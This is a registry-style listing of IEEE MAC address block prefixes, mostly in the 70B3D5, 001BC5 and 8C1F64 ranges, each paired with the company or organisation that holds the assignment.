Bisscheroux bv 70B3D5E80 Changzhou Rapid Information Technology Co,Ltd 70B3D56B9 Becton Dickinson 70B3D541D Azmoon Keifiat 70B3D5219 D-E-K GmbH & Co.KG 70B3D5B4F AvMap srlu 70B3D59EA Blue Storm Associates, Inc. 70B3D5057 RCH ITALIA SPA 70B3D5539 Tempris GmbH 70B3D5BBB YUYAMA MFG Co.,Ltd 70B3D5C4E ARKRAY, Inc. Kyoto Laboratory 70B3D5A39 SPETSSTROY-SVYAZ Ltd 70B3D50B1 AirBie AG 70B3D55DD Theatrixx Technologies, Inc. 70B3D5101 Adolf Nissen Elektrobau GmbH + Co. KG 70B3D56BC EA Elektroautomatik GmbH & Co. KG 70B3D526F COMPAL ELECTRONICS, INC. 70B3D55AE TinTec Co., Ltd. 70B3D51AA Echo Ridge, LLC 70B3D5D15 3DGence sp. z o.o. 70B3D5D39 ASHIDA Electronics Pvt. Ltd 70B3D5F0A Neuronal Innovation Control S.L. 70B3D5684 LECO Corporation 70B3D57FF eumig industrie-TV GmbH. 70B3D59FE SURUGA SEIKI CO., LTD. 70B3D5E56 HIPODROMO DE AGUA CALIENTE, S.A. DE C.V. 70B3D5783 CHIeru., CO., Ltd. 70B3D5C7B EM Clarity Pty Ltd 70B3D5414 Smith Meter, Inc. 70B3D5C83 CertusNet Inc. 70B3D5E38 Cursor Systems NV 70B3D56CA LINEAGE POWER PVT LTD., 70B3D5158 EAX Labs s.r.o. 70B3D5458 Ongisul Co.,Ltd. 70B3D522B VITEC 70B3D5E81 SLAT 70B3D5F6C VisioGreen 70B3D570B Alere Technologies AS 70B3D5C04 Prolan Zrt. 70B3D5DFB Yamamoto Works Ltd. 70B3D56E5 DEUTA-WERKE GmbH 70B3D5C51 Innotas Elektronik GmbH 70B3D5CC6 MB connect line GmbH Fernwartungssysteme 70B3D5B73 Cetto Industries 70B3D5E8A Melecs EWS GmbH 70B3D583A EMDEP CENTRO TECNOLOGICO MEXICO 70B3D542D RCH ITALIA SPA 70B3D5B52 AEye, Inc. 70B3D58C4 APE GmbH 70B3D5E1E Umano Medical Inc. 70B3D5BB5 Grossenbacher Systeme AG 70B3D5F29 SamabaNova Systems 70B3D5A4D LANSITEC TECHNOLOGY CO., LTD 70B3D537E ELINKGATE JSC 70B3D5B20 ICT BUSINESS GROUP of Humanrights Center for disabled people 70B3D5388 Xitron 70B3D5558 Multiple Access Communications Ltd 70B3D57BC FIRST RF Corporation 70B3D5D3A PROMOMED RUS LLC 70B3D50AD Vega-Absolute 70B3D5DD9 MaNima Technologies BV 70B3D5795 TIECHE Engineered Systems 70B3D54A8 Acrodea, Inc. 70B3D5A42 iMAR Navigation GmbH 70B3D5A45 Viper Innovations Ltd 70B3D5808 Becton Dickinson 70B3D5628 MECT SRL 70B3D56BA Integrotech sp. z o.o. 70B3D5275 INTERNET PROTOCOLO LOGICA SL 70B3D5535 SITA Messtechnik GmbH 70B3D50A7 Traffic and Parking Control Co, Inc. 70B3D5121 Shenzhen Luxurite Smart Home Ltd 70B3D5BCD Sasken Technologies Ltd 70B3D5648 Magnamed Tecnologia Medica S/A 70B3D5860 KBS Industrieelektronik GmbH 70B3D5B1A Aaronia AG 70B3D557F MBio Diagnostics, Inc. 70B3D547E Fiber Optika Technologies Pvt. Ltd. 70B3D5150 YUYAMA MFG Co.,Ltd 70B3D5E79 Acrodea, Inc. 70B3D51E1 TEX COMPUTER SRL 70B3D56A3 OutdoorLink 70B3D5D4F C-COM Satellite Systems Inc. 70B3D5345 AT-Automation Technology GmbH 70B3D5B46 FAS Electronics (Fujian) Co.,LTD. 70B3D589A Algodue Elettronica Srl 70B3D5C40 HongSeok Ltd. 70B3D5A7B SmartSafe 70B3D59C4 aelettronica group srl 70B3D5391 Changshu Ruite Electric Co.,Ltd. 70B3D594E BP Lubricants USA, Inc. 70B3D5430 Algodue Elettronica Srl 70B3D5972 AixControl GmbH 70B3D58E2 Zhiye Electronics Co., Ltd. 70B3D5A5D Position Imaging 70B3D572F Ava Technologies 70B3D586B AVL DiTEST 70B3D51B3 Graphcore Ltd 70B3D5C29 SOFTLAND INDIA LTD 70B3D5013 Sportsbeams Lighting, Inc. 70B3D556C Telensa Ltd 70B3D5512 Techno Broad,Inc 70B3D54EE NOA Co., Ltd. 70B3D5CFE Secturion Systems 70B3D544B Open System Solutions Limited 70B3D541B SYS TEC electronic GmbH 70B3D51BD Shenzhen Siera Technology Ltd 70B3D52FF Sunstone Engineering 70B3D5071 FSR, INC. 70B3D5A22 eSys Solutions Sweden AB 70B3D5BB6 Franke Aquarotter GmbH 70B3D5003 ANYROAM 70B3D514B C21 Systems Ltd 70B3D5F9B EvoLogics GmbH 70B3D54B3 Bacsoft 70B3D54C6 BlueBox Video Limited 70B3D5FC0 CODESYSTEM Co.,Ltd 70B3D52E8 Telefire 70B3D53FA Zaklad Energoelektroniki Twerd 70B3D5189 DAVE SRL 70B3D5293 Solar RIg Technologies 70B3D5688 MG s.r.l. 70B3D5B0F merkur Funksysteme AG 70B3D5AF8 boekel 70B3D5E32 HERUTU ELECTRONICS CORPORATION 70B3D53F5 DOLBY LABORATORIES, INC. 70B3D5A8D Code Blue Corporation 70B3D5C64 SYS TEC electronic GmbH 70B3D5707 Koco Motion US LLC 70B3D5BCB Smart Vision Lights 70B3D52A3 ATT Nussbaum Prüftechnik GmbH 70B3D5E61 Adeli 70B3D587F NAC Planning Co., Ltd. 70B3D51DC TEKVEL Ltd. 70B3D582D Elektronik Art S.C. 70B3D58A2 WINNERS DIGITAL CORPORATION 70B3D53B0 Millennial Net, Inc. 70B3D5225 RCD Radiokomunikace 70B3D53F2 H3D, Inc. 70B3D5360 PT. Emsonic Indonesia 70B3D5758 Grossenbacher Systeme AG 70B3D5415 IDEA SPA 70B3D5C0B FSTUDIO CO LTD 70B3D5CDF 3D Printing Specialists 70B3D517F MB connect line GmbH Fernwartungssysteme 70B3D5AA2 eumig industrie-TV GmbH. 70B3D50BF Den Automation 70B3D5084 Rako Controls Ltd 70B3D553C Airthings 70B3D5B9C EDCO Technology 1993 ltd 70B3D5664 Sankyo Intec co.,ltd 70B3D53C7 SOFTCREATE CORP. 70B3D59AA Tecsys do Brasil Industrial Ltda 70B3D5515 PCSC 70B3D5C1A Xylon 70B3D5C9E FUKUDA SANGYO CO., LTD. 70B3D578F SoFiHa 70B3D5E52 Guangzhou Moblin Technology Co., Ltd. 70B3D5A0A CAPSYS 70B3D55CC Akse srl 70B3D523B Fink Telecom Services 70B3D519F Koizumi Lighting Technology Corp. 70B3D5478 Touchnet/OneCard 70B3D51D1 Eurotek Srl 70B3D52A4 GSP Sprachtechnologie GmbH 70B3D510E Colorimetry Research, Inc 70B3D52A9 Power Electronics Espana, S.L. 70B3D5D72 OnYield Inc Ltd 70B3D5A37 MITSUBISHI HEAVY INDUSTRIES THERMAL SYSTEMS, LTD. 70B3D54EC Hangzhou Youshi Industry Co., Ltd. 70B3D5BCE YAWATA ELECTRIC INDUSTRIAL CO.,LTD. 70B3D5027 Redcap Solutions s.r.o. 70B3D5613 Suprock Technologies 70B3D5676 samwooeleco 70B3D5D89 Resolution Systems 70B3D5224 Urbana Smart Solutions Pte Ltd 70B3D5AAF Exi Flow Measurement Ltd 70B3D5257 LG Electronics 70B3D5810 Advice 70B3D5A13 Uplevel Systems Inc 70B3D5023 Cambridge Pixel 70B3D5FB7 SAICE 70B3D5D4B Hermann Lümmen GmbH 70B3D54B4 Hi Tech Systems Ltd 001BC508C Triax A/S 70B3D54AF Agramkow Fluid Systems A/S 70B3D570A PULLNET TECHNOLOGY, SA DE CV SSC1012302S73 70B3D58B7 Contec Americas Inc. 70B3D5436 Henrich Electronics Corporation 70B3D527F ST Aerospace Systems 70B3D54D4 Nortek Global HVAC 70B3D5A17 Tunstall A/S 70B3D5555 SoftLab-NSK 70B3D509B Jacarta Ltd 001BC500E Vigor Electric Corp 70B3D5BB9 KOSMEK.Ltd 70B3D54F9 OptoPrecision GmbH 70B3D598B Richard Paul Russell Ltd 70B3D5784 Shenzhen bayue software co. LTD 70B3D5711 X-Laser LLC 70B3D5C67 Collini Dienstleistungs GmbH 70B3D5C2F ATBiS Co.,Ltd 70B3D55E3 Imecon Engineering SrL 70B3D503C Ultimate Software 70B3D5777 QUERCUS TECHNOLOGIES, S.L. 70B3D5D5C Critical Link LLC 70B3D51D0 Shenzhen INVT Electric Co.,Ltd 70B3D5368 White Matter LLC 70B3D563F DARBS Inc. 70B3D5717 Secure Systems & Services 70B3D5999 LOGICUBE INC 70B3D5153 Schneider Electric Motion USA 70B3D57FD SYS TEC electronic GmbH 70B3D598E Autocom Diagnostic Partner AB 70B3D591F JSC "InformInvestGroup" 70B3D5246 Saline Lectronics, Inc. 70B3D519B Global Technical Systems 70B3D524B TOSEI ENGINEERING CORP. 70B3D52CD Korea Airports Corporation 70B3D5D22 DEK Technologies 70B3D5CD1 Cannex Technology Inc. 70B3D5CC5 Intecom 70B3D52AA Flirtey Inc 70B3D5953 Spectrum Techniques, LLC 70B3D59D5 Southern Tier Technologies 70B3D5A3F PHPower Srl 70B3D5877 Polynet Telecommunications Consulting and Contractor Ltd. 70B3D5B13 Omwave 70B3D50DE Grossenbacher Systeme AG 70B3D5F75 Enlaps 70B3D58A8 megatec electronic GmbH 70B3D5169 Service Plus LLC 70B3D5B98 GSF Corporation Pte Ltd 70B3D54B2 Certus Operations Ltd 70B3D573D NETWAYS GmbH 70B3D5F9C SureFlap Ltd 70B3D5432 DEUTA-WERKE GmbH 70B3D5678 The Dini Group, La Jolla inc. 70B3D52F4 Radixon s.r.o. 70B3D530D Fiberbase 70B3D55B8 Hella Gutmann Solutions GmbH 70B3D5035 HKW-Elektronik GmbH 70B3D5379 Vensi, Inc. 70B3D5374 OOO NPP Mars-Energo 70B3D5381 CRDE 70B3D5413 Axess AG 70B3D5B2E Green Access Ltd 70B3D5C14 Grupo Epelsa S.L. 70B3D5F42 Matsuhisa Corporation 70B3D5F24 Daavlin 70B3D577B AeroVision Avionics, Inc. 70B3D5FA6 RFL Electronics, Inc. 70B3D5FBC Twoway Communications, Inc. 70B3D5D6C GP Systems GmbH 70B3D5245 Newtec A/S 70B3D5C6E Orion Technologies, LLC 70B3D5DDB Intra Corporation 70B3D58EE Network Additions 70B3D5D4D The Morey Corporation 70B3D5C8C Rollogo Limited 70B3D559C DAVE SRL 70B3D5CC9 Rapiscan Systems 70B3D584D Quantum Design Inc. 70B3D590F DTRON Communications (Pty) Ltd 70B3D5D10 Contec Americas Inc. 70B3D57E0 Sanko-sha,inc. 70B3D56A6 WOW System 70B3D50B4 AVER 70B3D5805 Eurotronik Kranj d.o.o. 70B3D5D92 Zamir Recognition Systems Ltd. 70B3D5677 Fraunhofer-Institut IIS 70B3D51B6 DACOM West GmbH 70B3D5127 VITEC 70B3D58AC ​ASUNG TECHNO CO.,Ltd 70B3D5211 Fracarro srl 70B3D5108 TEX COMPUTER SRL 70B3D596D MSB Elektronik und Gerätebau GmbH 70B3D547F ASE GmbH 70B3D5653 Luxar Tech, Inc. 70B3D52B1 WIXCON Co., Ltd 70B3D5002 Gogo BA 70B3D57E8 Mannkind Corporation 70B3D5C49 BTG Instruments AB 70B3D590D Modtronix Engineering 70B3D5DCE Stahl GmbH 70B3D506B U-Tech 70B3D5022 Ravelin Ltd 70B3D5215 Dataspeed Inc 70B3D5745 TMSI LLC 70B3D510F neQis 70B3D59C6 Overspeed SARL 70B3D54BE GY-FX SAS 70B3D514C CRDE 70B3D516C OCEAN 70B3D5AD1 Sensile Technologies SA 70B3D505D KOMS Co.,Ltd. 70B3D522C Hiquel Elektronik- und Anlagenbau GmbH 70B3D5209 SmartNodes 70B3D5F12 Incoil Induktion AB 70B3D57B2 Rail Power Systems GmbH 70B3D5348 BÄR Bahnsicherung AG 70B3D592A Miravue 70B3D588D LG Electronics 70B3D51D4 Brinkmann Audio GmbH 70B3D5511 Next Sight srl 70B3D5CEA Computerwise, Inc. 70B3D5D58 Idyllic Engineering Pte Ltd 70B3D5222 Marioff Corporation Oy 70B3D5A18 Embedded Systems Lukasz Panasiuk 70B3D5954 Dot System S.r.l. 70B3D586E Profcon AB 70B3D5CF5 Petring Energietechnik GmbH 70B3D521D iRF - Intelligent RF Solutions, LLC 70B3D5E09 L-3 communications ComCept Division 70B3D5269 Gilbarco Veeder-Root ‎ 70B3D5482 Aeryon Labs Inc 70B3D54A9 WARECUBE,INC 70B3D58EC Rudy Tellert 70B3D51C5 ELSAG 70B3D5FBF SenSys (Design Electronics Ltd) 70B3D503D QUERCUS TECHNOLOGIES, S.L. 70B3D5122 Henri Systems Holland bv 70B3D568E CEA Technologies Pty Ltd 70B3D5272 TELECOM SANTE 70B3D57F4 KST technology 70B3D524D INFO CREATIVE (HK) LTD 70B3D532A Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D518C CMC Industrial Electronics Ltd 70B3D5E1A BIZERBA LUCEO 70B3D5939 Invertek Drives Ltd 70B3D5260 ModuSystems, Inc 70B3D58CA Allied Data Systems 70B3D52EC Grupo Epelsa S.L. 70B3D5C3D CISTECH Solutions 70B3D5B0C Vigilate srl 70B3D586C eeas gmbh 70B3D59F8 Asymmetric Technologies 70B3D5D9D Electroimpact, Inc. 70B3D5289 Shenzhen Rongda Computer Co.,Ltd 70B3D5DFC ELECTRONIC SYSTEMS DESIGN SPRL 70B3D587E Septentrio NV 70B3D5A89 GBS COMMUNICATIONS, LLC 70B3D573B S-I-C 70B3D5041 FIBERNET LTD 70B3D50DA Aquavision Distribution Ltd 70B3D5B37 CODEC Co., Ltd. 70B3D552C Centuryarks Ltd., 70B3D5DD8 EMSCAN Corp. 70B3D5A1B Potter Electric Signal Co. LLC 70B3D5C86 Woodam Co., Ltd. 70B3D5666 Aplex Technology Inc. 70B3D5607 ATEME 70B3D5F5C Nable Communications, Inc. 70B3D529F Code Hardware SA 70B3D5F76 Thermo Fisher Scientific 70B3D5F96 Ecologicsense 70B3D5A5A RCS Energy Management Ltd 70B3D5E8F DISMUNTEL, S.A. 70B3D5D2F L.I.F.E. Corporation SA 70B3D521E Hildebrand Technology Limited 70B3D5BE3 Saratov Electrounit Production Plant named after Sergo Ordzhonikidze, OJSC 70B3D5DB0 Arnouse Digital Devices Corp 70B3D5E30 QUISS AG 70B3D59AE Volansys technologies pvt ltd 70B3D5163 BHARAT HEAVY ELECTRICALS LIMITED 70B3D5821 HL2 group 70B3D5DDC Syscom Instruments SA 70B3D54B0 Tecogen Inc. 70B3D571B elsys 70B3D5889 Innovative Circuit Technology 70B3D558D DORLET SAU 70B3D561A Rocket Lab Ltd. 70B3D5EA0 PARK24 70B3D5697 Alazar Technologies Inc. 70B3D5AE7 E-T-A Elektrotechnische Apparate GmbH 70B3D5400 Vtron Pty Ltd 70B3D589B ControlWorks, Inc. 70B3D5854 Adimec Advanced Image Systems 70B3D56FF AKEO PLUS 70B3D5FB3 3PS Inc 70B3D5F9A Krabbenhøft og Ingolfsson 70B3D57FB db Broadcast Products Ltd 70B3D5174 Carlson Wireless Technologies Inc. 70B3D5649 swissled technologies AG 70B3D53BB A-M Systems 70B3D5274 Stercom Power Solutions GmbH 70B3D5513 MB connect line GmbH Fernwartungssysteme 70B3D591A Fujian Landfone Information Technology Co.,Ltd 70B3D5C63 Xentech Solutions Limited 70B3D5106 Aplex Technology Inc. 70B3D5925 Diamante Lighting Srl 70B3D5D11 EREE Electronique 70B3D537D The DX Shop Limited 70B3D5BD2 Burk Technology 70B3D57B6 Amada Miyachi America Inc. 70B3D5818 CRDE 70B3D53BC SciTronix 70B3D510C Vocality International Ltd 70B3D5932 Rohde&Schwarz Topex SA 70B3D5180 LHA Systems (Pty) Ltd 70B3D5CCC AEC s.r.l. 70B3D5200 NextEV Co., Ltd. 70B3D53D9 Aplex Technology Inc. 70B3D5E7C Aplex Technology Inc. 70B3D5F4F Power Electronics Espana, S.L. 70B3D5B33 Aplex Technology Inc. 70B3D54E9 ADETEC SAS 70B3D56A0 Active Research Limited 70B3D5E9B NUMATA R&D Co.,Ltd 70B3D53B2 Sicon srl 70B3D5A59 Muuntosähkö Oy - Trafox 70B3D5295 Cello Electronics (UK) Ltd 70B3D5C1B Labinvent JSC 70B3D597C Nu-Tek Power Controls and Automation 70B3D52F3 Scame Sistemi srl 70B3D5F3C Gigaray 70B3D5C9F Triax A/S 70B3D5DA8 Tagarno AS 70B3D590C ANTEK GmbH 70B3D5A78 Bionics co.,ltd. 70B3D5742 YUYAMA MFG Co.,Ltd 70B3D5AB4 SYS TEC electronic GmbH 70B3D502A BAE Systems Surface Ships Limited 70B3D58B1 M-Tech Innovations Limited 70B3D5EE1 allora Factory BVBA 70B3D50B9 Easy Digital Concept 70B3D53A9 Vivalnk 70B3D5528 Aplex Technology Inc. 70B3D528B Arnouse Digital Devices, Corp. 70B3D517D Entech Electronics 70B3D52E7 Atos spa 70B3D5BA7 Digital Yacht Ltd 70B3D5FE2 Galileo Tıp Teknolojileri San. ve Tic. A.S. 70B3D5B5C Prozess Technologie 70B3D5392 Contec Americas Inc. 70B3D5772 enModus 70B3D5046 Shenzhen Rihuida Electronics Co,. Ltd 70B3D5232 UCONSYS 70B3D58B0 IES S.r.l. 70B3D5091 PROFITT Ltd 70B3D5F55 Kohler Mira Ltd 70B3D526B Sorama BV 70B3D5E1C RoomMate AS 70B3D5FD2 DALIAN LEVEAR ELECTRIC CO., LTD 70B3D5847 Ai-Lynx 70B3D55D1 Software Motor Corp 70B3D5384 Sensohive Technologies 70B3D5A6F 8Cups 70B3D528A Transit Solutions, LLC. 70B3D55A0 Ascon Tecnologic S.r.l. 70B3D5124 Forschungs- und Transferzentrum Leipzig e.V. 70B3D5DB4 YUYAMA MFG Co.,Ltd 70B3D569E PTYPE Co., LTD. 70B3D552E Swissponic Sagl 70B3D5D1B Grupo Epelsa S.L. 70B3D54A1 Herholdt Controls srl 70B3D5326 NEMEUS-SAS 70B3D5FE6 SHIZUKI ELECTRIC CO.,INC 70B3D5AFE MESOTECHNIC 70B3D56A9 OHMORI ELECTRIC INDUSTRIES CO.LTD 70B3D5D81 PDD Group Ltd 70B3D58AB EMAC, Inc. 70B3D50C8 Fin Robotics Inc 70B3D5694 MoviTHERM 70B3D5033 Sailmon BV 70B3D5E77 OPTIX JSC 70B3D5570 Bayern Engineering GmbH & Co. KG 70B3D5645 Project Decibel, Inc. 70B3D5DE0 eCozy GmbH 70B3D5407 IDOSENS 70B3D53E9 APOLLO GIKEN Co.,Ltd. 70B3D525B GID Industrial 70B3D514E Innosonix GmbH 70B3D501E ePOINT Embedded Computing Limited 70B3D559D servicios de consultoria independiente S.L. 70B3D5E35 Nanospeed Technologies Limited 70B3D59F0 FUJICOM Co.,Ltd. 70B3D5554 Teletypes Manufacturing Plant 70B3D5A01 FeldTech GmbH 70B3D5404 RANIX,Inc. 70B3D56F9 ENVItech s.r.o. 70B3D5364 ADAMCZEWSKI elektronische Messtechnik GmbH 70B3D5FCF Acc+Ess Ltd 70B3D5B3E Paradigm Communication Systems Ltd 70B3D53C0 DK-Technologies A/S 70B3D5DC0 ATEME 70B3D5C88 SINED srl 70B3D588F Quaesta Instruments, LLC 70B3D5ADA Private 70B3D5835 CommBox P/L 70B3D59C8 Applied Systems Engineering, Inc. 70B3D5D8C Damerell Design Limited (DCL) 70B3D5866 MEPS Realtime 70B3D50D8 Laser Imagineering GmbH 70B3D5C21 Aplex Technology Inc. 70B3D5827 Metromatics Pty Ltd 70B3D52A7 Plasmability, LLC 70B3D582E PlayAlive A/S 70B3D5B85 Fenotech Inc. 70B3D5D8D Pullnet Technology,S.L. 70B3D51F3 Smart Energy Code Company Limited 70B3D55A9 Bunka Shutter Co., Ltd. 70B3D54BA Sinftech LLC 70B3D52BC EQUIPOS DE TELECOMUNICACIÓN OPTOELECTRÓNICOS, S.A. 70B3D5AD5 Birdland Audio 70B3D5A27 HDL da Amazônia Industria Eletrônica Ltda 70B3D56D1 Visual Engineering Technologies Ltd 70B3D53E2 AVI Pty Ltd 70B3D5FE8 PCME Ltd. 70B3D5F4C PolyTech A/S 70B3D5C3C PEEK TRAFFIC 70B3D5BAD Technik & Design GmbH 70B3D5BAE WARECUBE,INC 70B3D54AA Twoway Communications, Inc. 70B3D5EAC Kentech Instruments Limited 70B3D58AD Global Communications Technology LLC 70B3D5134 Conjing Networks Inc. 70B3D50CD AML Oceanographic 70B3D5E21 LLVISION TECHNOLOGY CO.,LTD 70B3D55B0 Qxperts Italia S.r.l. 70B3D520E Amrehn & Partner EDV-Service GmbH 70B3D579E CW2. Gmbh & Co. KG 70B3D5E23 Smith Meter, Inc. 70B3D5AB9 Dynamic Controls 70B3D5917 KSJ Co.Ltd 70B3D5341 Vtron Pty Ltd 70B3D5F5A HAMEG GmbH 70B3D5799 Vitec System Engineering Inc. 70B3D5A2A Redwood Systems 70B3D56ED Wiingtech International Co. LTD. 70B3D5AA8 West-Com Nurse Call Systems, Inc. 70B3D5BD3 FOTONA D.D. 70B3D56A5 Akenori PTE LTD 70B3D54F0 Li Seng Technology Ltd., 70B3D5F39 Zenros ApS 70B3D5C56 TELETASK 70B3D522E Private 70B3D599F Confed Holding B.V. 70B3D5DF6 Tiab Limited 70B3D5EFB PXM sp.k. 70B3D5A00 ATX NETWORKS LTD 70B3D541E Redler Computers 70B3D50C1 Nexus Technologies Pty Ltd 70B3D56E4 Institute of Power Engineering, Gdansk Division 70B3D5E6E Lieron BVBA 70B3D5BE1 FeCon GmbH 70B3D575D Nanjing Magewell Electronics Co., Ltd. 70B3D5030 Tresent Technologies 70B3D5660 Smart Service Technologies CO., LTD 70B3D53DA Loop Labs, Inc. 70B3D52BE Coherent Logix, Inc. 70B3D5796 GAMPT mbH 70B3D55E9 Zehetner-Elektronik GmbH 70B3D59F1 RFEL Ltd 70B3D5C39 MeshWorks Wireless Oy 70B3D526E HI-TECH SYSTEM Co. Ltd. 70B3D565B Roush 70B3D59F5 Vickers Electronics Ltd 70B3D5D0C Connor Winfield LTD 70B3D5B82 Lookout Portable Security 70B3D539A Videotrend srl 70B3D58E1 WoKa-Elektronik GmbH 70B3D58E0 SOUDAX EQUIPEMENTS 70B3D5502 Glidewell Laboratories 70B3D5A6D Metek Meteorologische Messtechnik GmbH 70B3D50FF INTERNET PROTOCOLO LOGICA SL 70B3D5882 SIMON TECH, S.L. 70B3D548D OMEGA BILANCE SRL SOCIETA' UNIPERSONALE 70B3D58DC Niveo International BV 70B3D55F0 managee GmbH & Co KG 70B3D555D LunaNexus Inc 70B3D536D Cyberteam Sp z o o 70B3D508E Beijing CONvision Technology Co.,Ltd 70B3D5C6D Cyviz AS 70B3D5DA1 Qprel srl 70B3D5710 Guardian Controls International Ltd 70B3D5AEE DiTEST Fahrzeugdiagnose GmbH 70B3D5ECF Ipitek 70B3D5A40 STRACK LIFT AUTOMATION GmbH 70B3D5B16 XI'AN SHENMING ELECTRON TECHNOLOGY CO.,LTD 70B3D543D Veryx Technologies Private Limited 70B3D5BCA Deymed Diagnostic 70B3D53E5 ATEME 70B3D5F2A WIBOND Informationssysteme GmbH 70B3D5BBD Providius Corp 70B3D586D Census Digital Incorporated 70B3D5C96 UNI DIMENXI SDN BHD 70B3D55B5 Lehigh Electric Products Co 70B3D5A2F Botek Systems AB 70B3D5C27 GD Mission Systems 70B3D5B15 Eta Beta Srl 70B3D59A7 Honeywell 70B3D50FB Cygnus LLC 70B3D5DDD BIO RAD LABORATORIES 70B3D5C8D KST technology 70B3D5871 Oso Technologies 70B3D5918 Glova Rail A/S 001BC50C9 UAB Kitron 001BC50C6 Connode 001BC50C5 Gill Instruments Ltd 001BC50BD Bridge Diagnostics, Inc. 001BC50BA NT MICROSYSTEMS 001BC50AD Tierra Japan Co.,Ltd 001BC50AC AVnu Alliance 001BC50A9 Elektrometal SA 001BC50AF Enerwise Solutions Ltd. 001BC50A8 Link Precision 001BC50A7 L.G.L. Electronics S.p.a. 001BC509E K+K Messtechnik GmbH 001BC50A5 Tesla Controls 001BC50A4 RADMOR S.A. 001BC509B YIK Corporation 001BC5097 Plexstar Inc. 001BC5090 Seven Solutions S.L 001BC5091 3green ApS 001BC5086 CAST Group of Companies Inc. 001BC5084 Applied Innovations Research LLC 001BC5076 PLAiR Media, Inc 001BC507B QCORE Medical 001BC507A Servicios Electronicos Industriales Berbel s.l. 001BC5078 Donbass Soft Ltd and Co.KG 001BC506A IST GmbH 001BC5066 Manufacturas y transformados AB 001BC5059 INPIXAL 001BC5056 ThinKom Solutions, Inc 001BC5050 TeliSwitch Solutions 001BC5053 Metrycom Communications Ltd 001BC5052 Engineering Center ENERGOSERVICE 001BC504D eiraku electric corp. 001BC5048 XPossible Technologies Pte Ltd 001BC5043 Coincident, Inc. 001BC5044 ZAO "RADIUS Avtomatika" 001BC503A MindMade Sp. z o.o. 001BC502E BETTINI SRL 001BC5000 Converging Systems Inc. 001BC5002 GORAMO - Janusz Gorecki 001BC500F Simavita Pty Ltd 8C1F64810 Kymata Srl 8C1F64A6E shenzhen beswave co.,ltd 8C1F64D8F DEUTA-WERKE GmbH 8C1F64989 Phe-nX B.V. 70B3D5389 2KLIC inc. 8C1F645CD MAHINDR & MAHINDRA 8C1F6477F TargaSystem S.r.L. 8C1F64292 Gogo Business Aviation 8C1F64020 Utthunga Techologies Pvt Ltd 8C1F647AE D-E-K GmbH & Co.KG 8C1F647C7 Ascon Tecnologic S.r.l. 8C1F6491B Potter Electric Signal Co. LLC 8C1F64232 Monnit Corporation 8C1F64E8D Plura 8C1F6457D ISDI Ltd 8C1F647B1 EA Elektro-Automatik 8C1F64510 Novanta IMS 8C1F64D74 TEX COMPUTER SRL 8C1F6470B ONICON 8C1F6452A Hiwin Mikrosystem Corp. 8C1F64B2F Mtechnology - Gamma Commerciale Srl 8C1F64AD4 Flextronics International Kft 8C1F64461 Kara Partners LLC 8C1F64C6A Red Phase Technologies Limited 8C1F64B36 Pneumax Spa 8C1F6409E IWS Global Pty Ltd 70B3D5580 Private 8C1F64051 CP contech electronic GmbH 8C1F64BBC Liberator Pty Ltd 8C1F649F6 Vision Systems Safety Tech 8C1F64E24 COMETA SAS 70B3D5278 Medicomp, Inc 8C1F64113 Timberline Manufacturing 8C1F640F5 Vishay Nobel AB 8C1F64289 Craft4 Digital GmbH 8C1F64281 NVP TECO LTD 8C1F64B7D Scheurich GmbH 70B3D58AF QBIC COMMUNICATIONS DMCC 8C1F64439 BORNICO 8C1F64AA3 Peter Huber Kaeltemaschinenbau AG 8C1F646CB GJD Manufacturing 8C1F64EDA DEUTA-WERKE GmbH 8C1F64830 Vtron Pty Ltd 8C1F64329 YUYAMA MFG Co.,Ltd 8C1F64D9C Relcom, Inc. 8C1F645DA White2net srl 8C1F645C9 Abbott Diagnostics Technologies AS 8C1F64350 biosilver .co.,ltd 70B3D5BA3 TIAMA 8C1F64820 TIAMA 8C1F64349 WAVES SYSTEM 8C1F64412 Comercial Electronica Studio-2 s.l. 8C1F64C64 Ajeco Oy 8C1F643AF PSA Technology Ltda. 8C1F647D4 Penteon Corporation 8C1F64CE4 SL USA, LLC 8C1F64033 IQ Home Kft. 8C1F640AA DI3 INFOTECH LLP 8C1F640F2 Graphimecc Group SRL 8C1F646D9 Khimo 8C1F64928 ITG Co.Ltd 8C1F641B2 Rapid-e-Engineering Steffen Kramer 8C1F64DC2 Procon Electronics Pty Ltd 8C1F645F7 Eagle Harbor Technologies, Inc. 8C1F642D8 CONTROL SYSTEMS Srl 8C1F6488B Taiwan Aulisa Medical Devices Technologies, Inc 8C1F64C81 Taolink Technologies Corporation 8C1F6405C tickIoT Inc. 8C1F64B69 Quanxing Tech Co.,LTD 8C1F649BF ArgusEye TECH. INC 8C1F64F09 Texi AS 8C1F64EA8 Zumbach Electronic AG 70B3D5CBD PREO INDUSTRIES FAR EAST LTD 8C1F6456C ELTEK SpA 8C1F64842 Potter Electric Signal Co. LLC 70B3D5E2D BAE Systems Apllied Intelligence 8C1F6444F RealD, Inc. 8C1F64700 QUANTAFLOW 8C1F649B3 Böckelt GmbH 8C1F64A60 Active Optical Systems, LLC 8C1F64518 Wagner Group GmbH 8C1F6458E Novanta IMS 8C1F64A00 BITECHNIK GmbH 8C1F64E46 Nautel LTD 8C1F641C0 INVENTIA Sp. z o.o. 8C1F645EA BTG Instruments AB 8C1F64CC1 VITREA Smart Home Technologies Ltd. 8C1F6439A Golding Audio Ltd 8C1F6465D Action Streamer LLC 8C1F644DB Private 8C1F64F39 Weinan Wins Future Technology Co.,Ltd 70B3D5E34 Gamber Johnson-LLC 8C1F641B7 Rax-Tech International 8C1F64553 ENIGMA SOI Sp. z o.o. 8C1F64DAF Zhuhai Lonl electric Co.,Ltd 8C1F64740 Norvento Tecnología, S.L. 8C1F6416D Xiamen Rgblink Science & Technology Co., Ltd. 8C1F64F3D Byte Lab Grupa d.o.o. 8C1F6467C Ensto Protrol AB 8C1F64133 Vtron Pty Ltd 8C1F648C5 NextT Microwave Inc 8C1F64B0F HKC Security Ltd. 8C1F64F3B Beijing REMANG Technology Co., Ltd. 8C1F643CD Sejong security system Cor. 8C1F647B6 KEYLINE S.P.A. 8C1F647B5 Guan Show Technologe Co., Ltd. 8C1F6414B Potter Electric Signal Company 8C1F641B5 Xicato 8C1F64511 Control Aut Tecnologia em Automação LTDA 8C1F64D2A Anteus Kft. 8C1F64F12 CAITRON GmbH 8C1F64FE2 VUV Analytics, Inc. 8C1F64968 IAV ENGINEERING SARL 8C1F64F5B SemaConnect, Inc 8C1F6454A Belden India Private Limited 8C1F645DB GlobalInvacom 8C1F64FC2 I/O Controls 70B3D566A Nomadic 8C1F64268 Astro Machine Corporation 8C1F64043 AperNet, LLC 8C1F64EE0 Private 8C1F64197 TEKVOX, Inc 